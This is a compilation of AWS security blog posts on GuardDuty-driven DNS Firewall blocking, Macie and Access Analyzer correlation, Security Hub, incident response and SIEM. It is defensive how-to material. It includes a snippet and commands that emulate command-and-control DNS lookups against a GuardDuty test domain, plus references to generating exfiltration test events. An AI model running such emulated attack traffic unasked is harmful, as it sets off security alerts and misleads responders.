  3. Choose the domain list associated with the BLOCK rule. Confirm that rules were created to block traffic from the source and to the domain that you specified in the test event. The domain list should look similar to what is shown in Figure 15.
     
    Figure 15: Verify that the domain was added to the blocked domain list

Step 5: Confirm the SNS notification

In this step, you’ll view the SNS notification that was sent to the email address you set up.

To confirm the SNS notification

  • Review the email inbox for the value that you provided for the AdminEmail parameter and look for a message with the subject line “AWS Notification Message.” The contents of the message from SNS should be similar to the following.
    {"Blocked":"true","Input":{"ResponseMetadata":{"RequestId":"HOLOAAENUS3MN9B0DS6CO8BF4BVV4KQNSO5AEMVJF66Q9ASUAAJG","HTTPStatusCode":200,"HTTPHeaders":{"server":"Server","date":"Wed, 17 Nov 2021 08:20:38 GMT","content-type":"application/x-amz-json-1.0","content-length":"2","connection":"keep-alive","x-amzn-requestid":"HOLOAAENUS3MN9B0DS6CO8BF4BVV4KQNSO5AEMVJF66Q9ASUAAJG","x-amz-crc32":"2745614147"},"RetryAttempts":0}}}
    

Step 6: Apply the rule group to your VPC by using DNS Firewall

As part of the CloudFormation template deployment, two test VPCs have been created for you, to demonstrate that you can assign a single DNS Firewall rule group to multiple VPCs. You can also associate this rule group to your existing VPC of interest. To learn how to do this task, see Managing associations between your VPC and Route 53 Resolver DNS Firewall rule group. For visibility into DNS queries and for debugging purposes, the template creates log groups that accumulate DNS Resolver query logs.
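If you prefer to script the association, the following is a minimal boto3 sketch; the rule group ID, VPC ID, and names are placeholders for your own values.

    import boto3

    resolver = boto3.client("route53resolver")

    # Associate an existing DNS Firewall rule group with a VPC of interest.
    resolver.associate_firewall_rule_group(
        CreatorRequestId="demo-association-1",  # idempotency token
        FirewallRuleGroupId="rslvr-frg-0123456789abcdef",
        VpcId="vpc-0123456789abcdef0",
        Priority=200,  # must be unique among this VPC's associations
        Name="demo-rule-group-association",
    )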

After you’ve successfully tested the given sample that emulates C&CActivity.B!DNS, you can repeat steps 3 to 6 for the MaliciousDomainRequest.Reputation finding sample and the DNSDataExfiltration finding sample.

These samples are supplied for your convenience, and you will see the blocking action within a few minutes. Alternatively, you can test in other ways, which might take about an hour for the blocking action to occur. To initiate DNS C&C activity, you can make a DNS request from your instance (using dig for Linux or nslookup for Windows) against the test domain guarddutyc2activityb.com. Alternatively, you can use GuardDuty Tester, which generates unauthorized events that include DNS C&C activity and DNS exfiltration.
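For example, the following Python snippet, run from an instance in a VPC that is associated with the rule group, triggers the same kind of DNS lookup that dig or nslookup would:

    import socket

    # Trigger a DNS query from the instance; once the BLOCK rule is in place,
    # resolution of the test domain should fail.
    try:
        print(socket.gethostbyname("guarddutyc2activityb.com"))
    except socket.gaierror as err:
        print(f"Lookup blocked or failed: {err}")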

To take this solution one step further, you can implement automatic aging out of the domains that are added to the domain list. One way to do this is to use the Time to Live (TTL) feature in DynamoDB and repopulate the domain list from DynamoDB at regular intervals. The benefit of this approach is that if the malicious nature of a domain in the domain list changes over time, the list is kept up to date through the age-out and repopulation process.
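The following is a minimal sketch of the DynamoDB side of that approach; the table and attribute names are hypothetical, and a scheduled job would rebuild the DNS Firewall domain list from the items that have not yet expired.

    import time
    import boto3

    dynamodb = boto3.client("dynamodb")

    TABLE = "BlockedDomains"      # hypothetical table name
    TTL_ATTRIBUTE = "expires_at"  # hypothetical TTL attribute

    # One-time setup: have DynamoDB delete items after their expiry time.
    dynamodb.update_time_to_live(
        TableName=TABLE,
        TimeToLiveSpecification={"Enabled": True, "AttributeName": TTL_ATTRIBUTE},
    )

    # When adding a domain, record an expiry 30 days out.
    dynamodb.put_item(
        TableName=TABLE,
        Item={
            "domain": {"S": "guarddutyc2activityb.com"},
            TTL_ATTRIBUTE: {"N": str(int(time.time()) + 30 * 24 * 3600)},
        },
    )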

Considerations

There are a few considerations that you should keep in mind regarding DNS Firewall:

  • DNS Firewall and AWS Network Firewall work together for improved domain-filtering capability across HTTP(S) traffic. A domain list that you configure in Network Firewall should reflect the domain list configured in DNS Firewall.
  • DNS Firewall filters based on the domain name. It doesn’t translate that domain name to an IP address to be blocked.
  • It’s a best practice to block outbound traffic to port 53 with network access control lists (network ACLs) or Network Firewall so that GuardDuty can monitor DNS queries.
  • DNS Firewall filters DNS queries to the Amazon Route 53 Resolver (also known as AmazonProvidedDNS or VPC .2 Resolver) in the VPC. So for traffic leaving the VPC, we recommend that you use DNS Firewall along with Network Firewall, which you can use to secure traffic that isn’t headed to Amazon Route 53 Resolver. Network Firewall can also block domain names that exist in network traffic leaving the Amazon VPC, such as in HTTP HOST headers, TLS Server Name Indication (SNI) fields, and so on.
  • You can use Network Firewall to block external encrypted DNS services so that these services can’t be used to circumvent your DNS Firewall policies.

Conclusion

In this blog post, you learned how to automatically block malicious domains by using Route 53 Resolver DNS Firewall and GuardDuty. You can use this sample solution to automatically block communication to suspicious hosts discovered by GuardDuty, and you can apply those blocks across all DNS firewalls configured within your account.

All of the code for this solution is available on GitHub. Feel free to play around with the code; we hope it helps you learn more about automated security remediation. You can adjust the code to better fit your unique environment or extend the code with additional steps.

If you have comments about this blog post, submit them in the Comments section below. If you have questions about using this solution, start a thread in the Route 53 Resolver forum or GuardDuty forums, or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Akshay Karanth

Akshay is a senior solutions architect at AWS. He helps digital native businesses learn, build, and grow in the AWS Cloud. Before AWS, he worked at companies such as Juniper Networks and Microsoft in various customer-facing roles across the networking and security domains. When not at work, Akshay enjoys hiking up a hard trail or cooking a fulfilling meal with his family.

Author

Rohit Aswani

Rohit is a specialist solutions architect focused on networking at AWS, where he helps customers build and design scalable, highly available, secure, resilient, and cost-effective networks. He holds an MS in telecommunication systems management from Northeastern University, specializing in computer networking.

Contributor

Special thanks to Fabrice Dall’ara who made significant contributions to this post.

Correlate IAM Access Analyzer findings with Amazon Macie

Post Syndicated from Nihar Das original https://aws.amazon.com/blogs/security/correlate-iam-access-analyzer-findings-with-amazon-macie/

In this blog post, you’ll learn how to detect when unintended access has been granted to sensitive data in Amazon Simple Storage Service (Amazon S3) buckets in your Amazon Web Services (AWS) accounts.

It’s critical for your enterprise to understand where sensitive data is stored in your organization and how and why it is shared. The ability to efficiently find data that is shared with entities outside your account and the contents of that data is paramount. You need a process to quickly detect and report which accounts have access to sensitive data. Amazon Macie is an AWS service that can detect many sensitive data types. Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover and help protect your sensitive data in AWS.

AWS Identity and Access Management (IAM) Access Analyzer helps to identify resources in your organization and accounts, such as S3 buckets or IAM roles, that are shared with an external entity. When you enable IAM Access Analyzer, you create an analyzer for your entire organization or for a single account; the organization or account you choose is known as the analyzer's zone of trust. The analyzer monitors the supported resources within that zone of trust, detects each instance of a resource shared outside it, and generates a finding about the resource and the external principals that have access to it.
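For example, creating an organization-wide analyzer takes a single API call. The following is a minimal boto3 sketch; the analyzer name is hypothetical, and you can use type="ACCOUNT" to scope the zone of trust to a single account instead.

    import boto3

    accessanalyzer = boto3.client("accessanalyzer")

    # Create an analyzer whose zone of trust is the entire organization.
    accessanalyzer.create_analyzer(
        analyzerName="org-external-access-analyzer",  # hypothetical name
        type="ORGANIZATION",
    )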

Currently, you can use IAM Access Analyzer and Macie to detect external access and discover sensitive data as separate processes. You can join the findings from both to best evaluate the risk. The solution in this post integrates IAM Access Analyzer, Macie, and AWS Security Hub to automate the process of correlating findings between the services and presenting them in Security Hub.

How does the solution work?

First, IAM Access Analyzer discovers S3 buckets that are shared outside the zone of trust. Next, the solution schedules a Macie sensitive data discovery job for each of these buckets to determine whether the bucket contains sensitive data. Upon discovery of shared sensitive data in S3, a custom high-severity finding is created in Security Hub for review and incident response.

Solution architecture

This solution is based on a serverless architecture and uses the AWS services shown in Figure 1.

Figure 1: Architecture diagram

Figure 1 depicts the following process flow:

  1. IAM Access Analyzer detects shared S3 buckets outside of the zone of trust—the organization or account you choose is known as a zone of trust for the analyzer—and creates the event Access Analyzer Finding in EventBridge.
  2. EventBridge triggers the Lambda function sda-aa-save-findings.
  3. The sda-aa-save-findings function records each finding in DynamoDB.
  4. An EventBridge scheduled event periodically starts a new cycle of the Step Function state machine, which immediately runs the Lambda function sda-macie-submit-scan. The template sets a 15-minute interval, but this is configurable.
  5. The sda-macie-submit-scan function reads the IAM Access Analyzer findings that were created by sda-aa-save-findings from DynamoDB.
  6. sda-macie-submit-scan launches a Macie classification job for each distinct S3 bucket that is related to one or more recent IAM Access Analyzer findings.
  7. Macie performs a sensitive data discovery scan on each requested S3 bucket.
  8. The sda-macie-submit-scan function initiates the Lambda function sda-macie-check-status.
  9. sda-macie-check-status periodically checks the status of each Macie classification job, waiting for all the Macie jobs initiated by this solution to complete.
  10. Upon completion of the sda-macie-check-status function, the step function runs the Lambda function sda-sh-create-findings.
  11. sda-sh-create-findings joins the resulting IAM Access Analyzer and Macie datasets for each S3 bucket.
  12. sda-sh-create-findings publishes a finding to Security Hub for each bucket that has both external access and sensitive data (a sketch of this call follows the list).

    Note: The Macie scan is skipped if the S3 bucket is tagged to be excluded or if it was recently scanned by Macie. See the Cost considerations section for more information on custom configurations.

  13. Information security can review and act on the findings shown in Security Hub.
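As an illustration of step 12, a custom finding can be published through the Security Hub BatchImportFindings API. The following boto3 sketch is not the solution's actual code; the account ID, Region, bucket name, and finding fields are placeholders.

    import boto3
    from datetime import datetime, timezone

    securityhub = boto3.client("securityhub")

    account_id = "111122223333"  # placeholder account ID
    region = "us-east-1"         # placeholder Region
    now = datetime.now(timezone.utc).isoformat()

    # Pared-down ASFF finding; custom findings use the account's default product ARN.
    finding = {
        "SchemaVersion": "2018-10-08",
        "Id": f"sda-demo/{account_id}/examplebucket",
        "ProductArn": f"arn:aws:securityhub:{region}:{account_id}:product/{account_id}/default",
        "GeneratorId": "sda-sh-create-findings",
        "AwsAccountId": account_id,
        "Types": ["Sensitive Data Identifications"],
        "CreatedAt": now,
        "UpdatedAt": now,
        "Severity": {"Label": "HIGH"},
        "Title": "Sensitive data in externally shared S3 bucket",
        "Description": "Correlated IAM Access Analyzer and Macie findings for this bucket.",
        "Resources": [{"Type": "AwsS3Bucket", "Id": "arn:aws:s3:::examplebucket"}],
    }

    securityhub.batch_import_findings(Findings=[finding])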

Sample Security Hub output

Figure 2 shows the sample findings that Security Hub will present. Each finding includes:

  • Severity
  • Workflow status
  • Record state
  • Company
  • Product
  • Title
  • Resource
Figure 2: Sample Security Hub findings

The output to Security Hub will display a severity of HIGH with workflow NEW, because this is the first time the event has been observed. The record state is ACTIVE because the workflow state is NEW. The title explains the reason for the event.

For example, if potentially sensitive data is discovered in a bucket that is shared outside a zone of trust, selecting an event will display the resources involved in the finding so you can investigate. For more information, see the Security Hub User Guide.

Notes:

  • Detection of public S3 buckets by IAM Access Analyzer will still occur through Security Hub and will be marked as critical severity. This solution does not add to or augment this finding in Security Hub.
  • If a finding in IAM Access Analyzer is archived, the solution does not update the related finding in Security Hub.

Prerequisites

To use this solution, you need the following:

  • Permission to run AWS CloudFormation
  • Permission to create Lambda functions
  • Permission to create DynamoDB tables
  • Permission to create Step Function state machines
  • Permission to create EventBridge event rules
  • Permission to enable IAM Access Analyzer on the account where sensitive discovery is required
  • Permission to enable Macie on the account
  • Permission to enable Security Hub on the account

Deploy the solution

The solution is deployed through AWS CloudFormation, and you can review the template for options to best suit your specific needs.

  1. Sign in to your AWS account at https://aws.amazon.com/console/.
  2. In the AWS Management Console, navigate to the AWS CloudFormation service, and then choose Create stack.
  3. Under Prerequisite – Prepare template, choose Template is ready.
  4. Under Specify template, choose Amazon S3 URL and provide the following URL:
    https://awsiammedia.s3.amazonaws.com/public/sample/936-correlating-aa-findings-macie/sda-cfn.yml
  5. Choose Next.
  6. Enter the stack name.
  7. The Application code location, S3 Bucket, and S3 Key fields will be pre-filled.
  8. Under Service Activations, modify the activations based on the services you presently have running in your account.
  9. Modify the Logging and Monitoring settings if required.
  10. (Optional) Set an alert email address for errors.
  11. Choose Next, then choose Next again.
  12. Under Capabilities, select the check box.
  13. Choose Create Stack. The solution will begin deploying; watch for the CREATE_COMPLETE message.
Figure 3: Sample CloudFormation deployment status

The solution is now deployed and will start monitoring for sensitive data that is being shared. It will send the findings to Security Hub for your teams to investigate.

Cost considerations

When you scan large S3 buckets with sensitive data, remember that Macie cost is based on the amount of data scanned. For more information on Macie costs, see Amazon Macie pricing.

This solution allows the following options, which you can use to help manage costs:

  • Use environment variables in Lambda to skip specific tagged buckets
  • Skip recently scanned S3 buckets and reuse prior findings
Figure 4: Screen shot of configurable environment variable

Conclusion

In this post, we discussed how the solution uses Lambda, Step Functions, and EventBridge to integrate IAM Access Analyzer with Macie discovery jobs. We reviewed the components of the application, deployed it by using CloudFormation, and reviewed the output a security team would use to take appropriate actions. We also provided two ways that you can manage the costs associated with the solution.

After you deploy this project, you can modify it to meet your organization’s needs. For example, you can modify the tags to skip specific S3 buckets your organization has already classified to hold sensitive data. Customers who use multiple AWS accounts can designate a centralized Security Hub administrator account to receive the solution alerts from each member account. For more information on this option, see Designating a Security Hub administrator account.

If you have feedback about this post, please submit it in the Comments section below. If you have questions about this post, please start a new thread on the AWS Identity and Access Management forum.

Other resources

For more information on correlating security findings with AWS Security Hub and Amazon EventBridge, refer to this blog post.

Want more AWS Security news? Follow us on Twitter.

Nihar Das

Nihar has over 20 years of experience in various business domains, including financial services. As an AWS Senior Solutions Architect, he is passionate about solving challenges in the cloud and helps financial services customers migrate to AWS and support their continued innovation.

Joe Dunn

Joe is an AWS Senior Solutions Architect in Financial Services with over 20 years of experience in infrastructure architecture and migration of business-critical loads to AWS. He helps financial services customers to innovate on the AWS Cloud by providing solutions using AWS products and services.

Armand Aquino

Armand is a solutions architect helping financial services organizations design their critical workloads on AWS. In his spare time, he enjoys exploring outdoors and learning Korean.

AWS Security Profile: Ely Kahn, Principal Product Manager for AWS Security Hub

Post Syndicated from Maddie Bacon original https://aws.amazon.com/blogs/security/aws-security-profile-ely-kahn-principal-product-manager-for-aws-security-hub/

In the AWS Security Profile series, I interview some of the humans who work in Amazon Web Services Security and help keep our customers safe and secure. This interview is with Ely Kahn, principal product manager for AWS Security Hub. Security Hub is a cloud security posture management service that performs security best practice checks, aggregates alerts, and facilitates automated remediation.

How long have you been at AWS and what do you do in your current role?

I’ve been with AWS just over 4 years. I came to AWS through the acquisition of a company I co-founded called Sqrrl, which then became Amazon Detective. Shortly after the acquisition, I moved from the Sqrrl/Detective team and helped launch AWS Security Hub. In my current role, I’m the head of product for Security Hub, which means I lead our product roadmap and our product strategy, and I translate customer requirements into technical specifications.

How did you get started in the world of security?

My career started inside the U.S. federal government, first inside the Department of Homeland Security and, specifically, inside the Transportation Security Administration (TSA). At the time, the TSA had uncovered a vulnerability concerning boarding passes and the terrorist no-fly list. I was tasked with figuring out how to close that vulnerability, and I came up with a new way to embed a digital signature inside the barcode to help ensure the authenticity of the boarding pass. After that, people thought I was a cybersecurity expert, and I began working on a lot of cybersecurity strategy and policy at the Department of Homeland Security and then at the White House.

How do you explain your job to your non-tech friends?

I actually explain it the same way to technical and non-technical friends. I head up a service called Security Hub, which is designed to help you do a couple of different things. It helps you understand your security posture on AWS—what sort of risks you face and the most urgent security issues that you need to address across your AWS accounts. It also gives you the tools to improve your security posture and help you fix as many of those security issues as possible. We do that through three primary functions. First, we aggregate all of your security alerts into a standardized data format that’s available in one place. Second, we do our own automated security checks. We look at all the resources you’ve enabled on AWS and help check that those resources are configured in accordance with best practices that we define, and in alignment with various regulatory frameworks. Third, we help you auto-remediate and auto-respond to as many of those issues as possible.

What are you currently working on that you’re excited about?

Our number one priority with Security Hub is to expand coverage of the automated security checks that we provide. We have almost 200 automated security checks today covering several dozen AWS services. Over the next few years, we plan to expand this to more AWS services, which will add a large number of additional security checks. This is important because customers don’t want to have to write these security checks themselves. They want the one-click capability to turn on the checks—or controls, as we call them in Security Hub—and they should be automatically on in all of your accounts. They should only run if you’re using resources that are actually in-scope for those checks, and they should produce a security score to help you quickly understand the security posture of different accounts and of your organization as a whole.

What would you say is the coolest feature of Security Hub?

The coolest feature is probably the one that gets the least attention. It’s what we call our AWS Security Finding Format (ASFF). The ASFF is really just a data standard—it consists of over 1,000 JSON fields and objects, and it’s how you normalize all of your different security alerts. We’ve integrated 75 different services and partner products. The real advantage of Security Hub is that we automatically take all of those different alerts from all of those different integration partners and normalize them into this standardized data format, so that when you’re searching the findings you have a common set of fields to search against if you’re trying to do correlations. For example, you can imagine a situation where Amazon GuardDuty detects unusual activity in an Amazon Simple Storage Service (Amazon S3) bucket, one of our Security Hub checks detects that the bucket is open, and Amazon Macie determines that the bucket contains sensitive information. It’s much easier to do correlations for situations like this when the alerts from those different tools are in the same format. Similarly, building auto-response, auto-remediation workflows is much easier when all of your alerts are in the same format. One of our biggest customers at AWS called the ASFF the gold standard for how to normalize security alerts, which is something we’re super proud of.

As you mentioned, Security Hub integrates with a lot of other AWS services, like GuardDuty and Macie. How do you work with other service teams?

We work across AWS in a couple of different ways. We build out these integrations with other AWS services to either send or receive findings from those services. So, we receive findings from services like GuardDuty and Macie, and we send our findings to other services like AWS Trusted Advisor to give them the same view of security that we see in Security Hub. In general, we try to make it as simple and as low impact as possible because every service team is extremely busy. Wherever possible, we do the integration work and don’t put the onus of effort on the other service team.

The other way we work with other service teams is to formally define the best practices for that service. We have a security engineering team on Security Hub, and we partner with AWS Professional Services and their security consultants. Together, we have been working through the list of the most popular AWS services using a standard taxonomy of control categories to define security controls and best practices for that service. We then work with product managers and engineers on those service teams to review the controls we’re proposing, get their feedback, and then finally code them up as AWS Config rules before deploying them in Security Hub. We have a very well-honed process now to partner with the service teams to integrate with and define the security controls for each service.

Where do you suggest customers start with Security Hub if they are newer in their cloud journey?

The first step with Security Hub is just to turn it on across all of your accounts and AWS Regions. When you do, you’re likely going to see a lot of alerts. Don’t get overwhelmed with the number of alerts you see. Focus initially on the critical and high-severity alerts and work them as campaigns. Identify the owners for all open critical and high-severity alerts and start tracking burndown on a weekly basis. Coordinate with the leadership in your organization so you can identify which teams are keeping up with the alerts and which ones aren’t.

What’s your favorite Leadership Principle and why?

My favorite is one that I initially discounted: frugality. When I first joined AWS, what came to mind was Jeff Bezos using doors as desks. Although that’s certainly a component of frugality, I’ve found that for me, this principle means that we need to be frugal with each other’s time. There are so many competing demands on everyone’s time, and it’s extremely important in a place like AWS to be mindful of that. Make sure you’ve done your due diligence on something before you broadly ask the question or escalate.

What’s the thing you’re most proud of in your career?

There are two things. First is the acquisition of Sqrrl by AWS. I couldn’t have picked a better landing spot for Sqrrl and the team. I feel really lucky that I joined AWS through this acquisition. I’ve really learned a lot here in a short amount of time.

The other thing I’m especially proud of is to have been selected to do a stint through the White House National Security Council staff as the Department of Homeland Security representative to the Council. I sat in the cybersecurity directorate from 2009–2010 as part of that detail to the White House and got a chance to work in the West Wing and attend meetings in the Situation Room, which was just such a special experience.

If you had to pick an industry outside of security, what would you want to do?

This is pretty similar to security, but I got very close to going into the military. Out of high school, I was being recruited for lacrosse at the U.S. Air Force Academy. I had convinced myself that I wanted to go fly jets. I have the utmost respect for our military community, and I certainly could’ve seen myself taking that path.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Maddie Bacon

Maddie (she/her) is a technical writer for AWS Security with a passion for creating meaningful content. She previously worked as a security reporter and editor at TechTarget and has a BA in Mathematics. In her spare time, she enjoys reading, traveling, and all things Harry Potter.

Ely Kahn

Ely Kahn is the Principal Product Manager for AWS Security Hub. Before his time at AWS, Ely was a co-founder for Sqrrl, a security analytics startup that AWS acquired and is now Amazon Detective. Earlier, Ely served in a variety of positions in the federal government, including Director of Cybersecurity at the National Security Council in the White House.

Journey to Adopt Cloud-Native Architecture Series #5 – Enhancing Threat Detection, Data Protection, and Incident Response

Post Syndicated from Anuj Gupta original https://aws.amazon.com/blogs/architecture/journey-to-adopt-cloud-native-architecture-series-5-enhancing-threat-detection-data-protection-and-incident-response/

In Part 4 of this series, Governing Security at Scale and IAM Baselining, we discussed building a multi-account strategy and improving access management and least privilege to prevent unwanted access and to enforce security controls.

As a refresher from previous posts in this series, our example e-commerce company’s “Shoppers” application runs in the cloud. The company experienced hypergrowth, which posed a number of platform and technology challenges, including enforcing security and governance controls to mitigate security risks.

With the pace of new infrastructure and software deployments, we had to ensure we maintain strong security. This post, Part 5, shows how we detect security misconfigurations, indicators of compromise, and other anomalous activity. We also show how we developed and iterated on our incident response processes.

Threat detection and data protection

With our newly acquired customer base from hypergrowth, we had to make sure we maintained customer trust. We also needed to detect and respond to security events quickly to reduce the scope and impact of any unauthorized activity. We were concerned about vulnerabilities on our public-facing web servers, accidental sensitive data exposure, and other security misconfigurations.

Prior to hypergrowth, application teams scanned for vulnerabilities and maintained the security of their applications. After hypergrowth, we established a dedicated security team and identified tools to simplify the management of our cloud security posture. This allowed us to easily identify and prioritize security risks.

Use AWS security services to detect threats and misconfigurations

We use the following AWS security services to simplify the management of cloud security risks and reduce the burden of third-party integrations. This also minimizes the amount of engineering work required by our security team.

Detect threats with Amazon GuardDuty

We use Amazon GuardDuty to keep up with the newest threat actor tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).

GuardDuty saves us time and reduces complexity, because we don’t have to continuously engineer detections for new TTPs and IOCs for static events and machine-learning-based detections. This allows our security analysts to focus on building runbooks and quickly responding to security findings.

Discover sensitive data with Amazon Macie for Amazon S3

To host our external website, we use a few public Amazon Simple Storage Service (Amazon S3) buckets with static assets. We don’t want developers to accidentally put sensitive data in these buckets, and we wanted to understand which S3 buckets contain sensitive information, such as financial or personally identifiable information (PII).

We explored building a custom scanner to search for sensitive data, but maintaining the search patterns was too complex. It was also costly to continuously re-scan files each month. Therefore, we use Amazon Macie to continuously scan our S3 buckets for sensitive data. After Macie makes its initial scan, it will only scan new or updated objects in those S3 buckets, which reduces our costs significantly. We added filter rules to exclude large files, used S3 prefixes to scan only the required objects, and set a sampling rate to further optimize the cost of scanning large S3 buckets (in our case, buckets greater than 1 TB).
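As an illustration, a one-time Macie classification job with size-based scoping and a sampling rate takes only a few lines of boto3. The account ID, bucket name, job name, and thresholds below are placeholders, not our production configuration.

    import boto3

    macie = boto3.client("macie2")

    # One-time job: scan one bucket, skip objects over 100 MB, and sample
    # 10 percent of the eligible objects to control cost.
    macie.create_classification_job(
        jobType="ONE_TIME",
        name="website-assets-scan",  # hypothetical job name
        samplingPercentage=10,
        s3JobDefinition={
            "bucketDefinitions": [
                {"accountId": "111122223333", "buckets": ["examplebucket"]}
            ],
            "scoping": {
                "excludes": {
                    "and": [
                        {
                            "simpleScopeTerm": {
                                "comparator": "GT",
                                "key": "OBJECT_SIZE",
                                "values": [str(100 * 1024 * 1024)],
                            }
                        }
                    ]
                }
            },
        },
    )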

Scan for vulnerabilities with Amazon Inspector

Because we use a wide variety of operating systems and software, we must scan our Amazon Elastic Compute Cloud (Amazon EC2) instances for known software vulnerabilities, such as Log4J.

We use Amazon Inspector to run continuous vulnerability scans on our EC2 instances and Amazon Elastic Container Registry (Amazon ECR) container images. With Amazon Inspector, we can continuously detect if our developers are deploying and releasing vulnerable software on our EC2 instances and ECR images without setting up a third-party vulnerability scanner and installing additional endpoint agents.
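Enabling these continuous scans is a single API call per account. The following is a minimal boto3 sketch; for organization-wide rollout you would instead use the delegated administrator setup.

    import boto3

    inspector = boto3.client("inspector2")

    # Turn on continuous scanning for EC2 instances and ECR container images.
    inspector.enable(resourceTypes=["EC2", "ECR"])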

Aggregate security findings with AWS Security Hub

We don’t want our security analysts to arbitrarily act on one security finding over another. This is time-consuming and does not properly prioritize the highest risks to address. We also need to track ownership, view progress of various findings, and build consistent responses for common security findings.

With AWS Security Hub, our analysts can seamlessly prioritize findings from GuardDuty, Macie, Amazon Inspector, and many other AWS services. Our analysts also use Security Hub’s built-in security checks and insights to identify AWS resources and accounts that have a high number of findings and act on them.

Setting up the threat detection services

We set up these services by designating a delegated administrator account and aggregating findings in our security tooling account, as shown in Figures 1 and 2.

Our security analysts use Security Hub-generated Jira tickets to view, prioritize, and respond to all security findings and misconfigurations across our AWS environment.

Through this configuration, our analysts no longer need to pivot between various AWS accounts, security tool consoles, and Regions, which makes the day-to-day management and operations much easier. Figure 1 depicts the data flow to Security Hub.

Figure 1. Aggregation of security services in security tooling account

Figure 2. Delegated administrator setup

Incident response

Before hypergrowth, there was no formal way to respond to security incidents. To prevent future security issues, we built incident response plans and processes to quickly address potential security incidents and minimize the impact and exposure. Following the AWS Security Incident Response Guide and NIST framework, we adopted the following best practices.

Playbooks and runbooks for repeatability

We developed incident response playbooks and runbooks for repeatable responses for security events that include:

  • Playbooks for more strategic scenarios and responses based on some of the sample playbooks found here.
  • Runbooks that provide step-by-step guidance for our security analysts to follow in case an event occurs. We used Amazon SageMaker notebooks and AWS Systems Manager Incident Manager runbooks to develop repeatable responses for pre-identified incidents, such as suspected command and control activity on an EC2 instance.

Automation for quicker response time

After developing our repeatable processes, we identified areas where we could accelerate responses to security threats by automating the response. We used the AWS Security Hub Automated Response and Remediation solution as a starting point.

By using this solution, we didn’t need to build our own automated response and remediation workflow. The code is also easy to read, repeat, and centrally deploy through AWS CloudFormation StackSets. We used some of the built-in remediations like disabling active keys that have not been rotated for more than 90 days, making all Amazon Elastic Block Store (Amazon EBS) snapshots private, and many more. With automatic remediation, our analysts can respond quicker and in a more holistic and repeatable way.
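As a simplified, standalone illustration of one such remediation, the following boto3 sketch deactivates active access keys older than 90 days; the deployed solution instead uses the Lambda runbooks that ship with it.

    import boto3
    from datetime import datetime, timedelta, timezone

    iam = boto3.client("iam")
    cutoff = datetime.now(timezone.utc) - timedelta(days=90)

    # Walk all users and deactivate any active key created before the cutoff.
    for page in iam.get_paginator("list_users").paginate():
        for user in page["Users"]:
            keys = iam.list_access_keys(UserName=user["UserName"])
            for key in keys["AccessKeyMetadata"]:
                if key["Status"] == "Active" and key["CreateDate"] < cutoff:
                    iam.update_access_key(
                        UserName=user["UserName"],
                        AccessKeyId=key["AccessKeyId"],
                        Status="Inactive",
                    )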

Simulations to improve incident response capabilities

We implemented quarterly incident response simulations. These simulations test how well prepared our people, processes, and technologies are for an incident. We included some cloud-specific simulations like an S3 bucket exposure and an externally shared Amazon Relational Database Service (Amazon RDS) snapshot to ensure our security staff are prepared for an incident in the cloud. We use the results of the simulations to iterate on our incident response processes.

Conclusion

In this blog post, we discussed how to prepare for, detect, and respond to security events in an AWS environment. We identified security services to detect security events, vulnerabilities, and misconfigurations. We then discussed how to develop incident response processes through building playbooks and runbooks, performing simulations, and automation. With these new capabilities, we can detect and respond to a security incident throughout hypergrowth.

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Other blog posts in this series

How to use AWS Security Hub and Amazon OpenSearch Service for SIEM

Post Syndicated from Ely Kahn original https://aws.amazon.com/blogs/security/how-to-use-aws-security-hub-and-amazon-opensearch-service-for-siem/

AWS Security Hub provides you with a consolidated view of your security posture in Amazon Web Services (AWS) and helps you check your environment against security standards and current AWS security recommendations. Although Security Hub has some similarities to security information and event management (SIEM) tools, it is not designed as a standalone SIEM replacement. For example, Security Hub only ingests AWS-related security findings and does not directly ingest higher volume event logs, such as AWS CloudTrail logs. If you have use cases to consolidate AWS findings with other types of findings from on-premises or other non-AWS workloads, or if you need to ingest higher volume event logs, we recommend that you use Security Hub in conjunction with a SIEM tool.

There are also other benefits to using Security Hub and a SIEM tool together. These include being able to store findings for longer periods of time than Security Hub retains them, aggregating findings across multiple administrator accounts, and further correlating Security Hub findings with each other and with other log sources. In this blog post, we will show you how you can use Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) as a SIEM and integrate Security Hub with it to accomplish these three use cases. Amazon OpenSearch Service is a fully managed service that makes it easier to deploy, manage, and scale Elasticsearch and Kibana. OpenSearch Service provides a distributed, RESTful search and analytics engine that is capable of addressing a growing number of use cases. You can expand OpenSearch Service with AWS services like Kinesis or Kinesis Data Firehose, by integrating with other AWS services, or by using traditional agents like Beats and Logstash for log ingestion, and Kibana for data visualization. Although OpenSearch Service is not an out-of-the-box SIEM tool either, with some customization you can use it for SIEM use cases.

Security Hub plus SIEM use cases

By enabling Security Hub within your AWS Organizations account structure, you immediately start receiving the benefits of viewing all of your security findings from across various AWS and partner services on a single screen. Some organizations want to go a step further and use Security Hub in conjunction with a SIEM tool for the following reasons:

  • Correlate Security Hub findings with each other and other log sources – This is the most popular reason customers choose to implement this solution. If you have various log sources outside of Security Hub findings (such as application logs, database logs, partner logs, and security tooling logs), then it makes sense to consolidate these log sources into a single SIEM solution. Then you can view both your Security Hub findings and miscellaneous logs in the same place and create alerts based on interesting correlations.
  • Store findings for longer than 90 days after the last update date – Some organizations want or need to store Security Hub findings for longer than 90 days after the last update date. They may want to do this for historical investigation, or for audit and compliance needs. Either way, this solution offers you the ability to store Security Hub findings in a private Amazon Simple Storage Service (Amazon S3) bucket, which is then consumed by Amazon OpenSearch Service.
  • Aggregate findings across multiple administrator accounts – Security Hub has a feature customers can use to designate an administrator account if they have enabled Security Hub in multiple accounts. A Security Hub administrator account can view data from and manage configuration for its member accounts. This allows customers to view and manage all their findings from multiple member accounts in one place. Sometimes customers have multiple Security Hub administrator accounts, because they have multiple organizations in AWS Organizations. In this situation, you can use this solution to consolidate all of the Security Hub administrator accounts into a single OpenSearch Service with Kibana SIEM implementation to have a single view across your environments. This related blog post walks through this use case in more detail, and shows how to centralize Security Hub findings across multiple AWS Regions and administrators. However, this blog post takes this approach further by introducing OpenSearch Service with Kibana to the use case, for a full SIEM experience.

Solution architecture

Figure 1: SIEM implementation on Amazon OpenSearch Service

